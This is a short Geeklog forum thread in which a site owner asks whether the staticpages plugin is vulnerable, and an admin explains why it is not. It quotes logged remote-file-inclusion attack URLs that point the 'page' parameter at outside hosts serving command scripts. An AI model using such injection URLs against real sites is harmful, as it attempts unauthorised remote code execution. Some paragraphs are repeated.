Welcome to Geeklog, Anonymous Friday, November 29 2024 @ 08:31 pm EST
Geeklog Forums
staticpages vulnerable?
anon
Anonymous
I get tons of hits to pages with the following structure:
http://mydomain.com/staticpages/index.php?page=http://wwop.org/cgi-bin/cmd.txt?
or
http://mydomain.com/staticpages/index.php?page=http://r3v3ng3.altervista.org/list.txt?
etc...
It seems to be trying to include a script. Does the staticpages plugin have some vulnerablility that would allow these scripts to run? or something like that? I'm running 1.4sr5, btw.
http://mydomain.com/staticpages/index.php?page=http://wwop.org/cgi-bin/cmd.txt?
or
http://mydomain.com/staticpages/index.php?page=http://r3v3ng3.altervista.org/list.txt?
etc...
It seems to be trying to include a script. Does the staticpages plugin have some vulnerablility that would allow these scripts to run? or something like that? I'm running 1.4sr5, btw.
4
5
Quote
Status: offline
Dirk
Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Nope, those are just script kiddies who don't know what they're doing.
The "page" parameter is actually used to get the content of the static page from the database, it will never try to request that URL.
bye, Dirk
The "page" parameter is actually used to get the content of the static page from the database, it will never try to request that URL.
bye, Dirk
5
5
Quote
anon
Anonymous
Thankyou very much Dirk. You've set my mind at ease.
btw, GeekLog is an incredible project! What makes it the best in my opinion is the support you all provide.
btw, GeekLog is an incredible project! What makes it the best in my opinion is the support you all provide.
5
6
Quote
All times are EST. The time is now 08:31 pm.
- Normal Topic
- Sticky Topic
- Locked Topic
- New Post
- Sticky Topic W/ New Post
- Locked Topic W/ New Post
- View Anonymous Posts
- Able to post
- Filtered HTML Allowed
- Censored Content